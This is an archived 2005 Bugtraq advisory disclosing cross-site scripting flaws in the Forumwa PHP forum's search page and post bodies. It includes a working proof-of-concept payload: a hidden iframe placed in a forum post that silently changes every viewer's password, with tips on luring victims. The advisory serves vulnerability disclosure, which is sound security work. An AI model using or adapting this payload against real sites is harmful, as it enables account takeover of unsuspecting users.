lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050301003521.12399.qmail@www.securityfocus.com>
Date: 1 Mar 2005 00:35:21 -0000
From: Raven <raven@...-security.com>
To: bugtraq@...urityfocus.com
Subject: Forumwa search.php xss vulnerability




 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][] 
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG005 
 [] Monday 03/01/05 
 [] Forumwa_v1  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own resonsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
  
 Vulnerable: Forumwa_v1 (any version)  
  
 
 ---  
  
 General information:  
  
 Forumwa is a simple discussion forum, based on PHP 
and MYSQL. Beside the basic-features there are 
special functions like search function, user 
profiles, memberlist, mailer, feedback? 
Multilanguage, easy installation.  
  
  
 ---  
  
 Description:  
  
 The search.php script is vulnerable to a XSS attack 
by a remote attacker. The searched string is not 
filtered for any harmfull characters like < > and ". 
This makes it possible for an attacker to trick a 
user into going to a harmfull page and stealing a 
session.  
  
 Also, the body and the subject of a message posted 
on the forum are not checked for < or > characters. 
The combination of these two vulnerabilitys makes a 
real big problem.  
  
  
 ---  
  
 Proof Of Concept:  
  
 What this proof of concept will do is load a 1x1px 
IFrame from a message in the board that will abuse 
the search.php xss attack to change a viewers 
password to "wh00ters". How to use: make a post 
containing the following body and hope someone 
actually views the messages on the board. Once they 
open the link to view the post, their account is 
yours. Tip, make it a nice thread that people will 
reply to so you know who you compromised.  
  
 ---PoC Injection---  
  
 <iframe SRC=http://[HOST URL CHANGEME!!!]/[FORUM 
DIRECTORY 
CHANGEME!!!]/search.php?keyword=%3C/title%3E%3Ciframe%20SRC=http://[HOST 
URL CHANGEME!!!]/[FORUM DIRECTORY 
CHANGEME!!!]/account.php?passwdu=wh00ters%26passwda=wh00ters%26emailu=u@...l.com%26changelog=change%20WIDTH=0%20HEIGHT=0%3E%3C/iframe%3E%3Ctitle%3E 
HEIGHT=1 WIDTH=1></iframe>  
  
 ---PoC Injection---  
  
 All that needs to be altered in this injection are 
the things between [ ] that says "CHANGEME!!!"  
  
  
 ---  
  
 Fix and Vendor status:  
  
Vendor has been notified; expect an official patch 
soon. 
  
 ---  
 
Greetz: 
 
All the people at hackerlounge.com, JWT, 
TGS-Security.com and JWT-Security.net. 
Specifically: 
 
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, 
Modzilla, Pingu, Jake Johnson, Afterburn, airo, 
cardiaC, chis, ComputerGeek, deep_phreeze, dudley, 
evasion, eXtacy, Mattewan, Afterburn, 
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, 
Slarty, NoUse, Snake (I hate you), Surreal (I hate 
you), -=Vanguard=-, The_IRS, puNKiey, driedice, 
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, 
voteforpedro, Cryptic_Override, kodaxx, 
~CreEpy~NoDquE~, Brainscan, the_exode, 
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and 
anyone else I forgot.  
 
 
--- 
 
Credit: 
 
HRG - Hackerlounge Research Group 
http://www.Hackerlounge.com 
 
  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG005 
 [] Monday 03/01/05 
 [] Forumwa_v1  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own resonsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][] 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ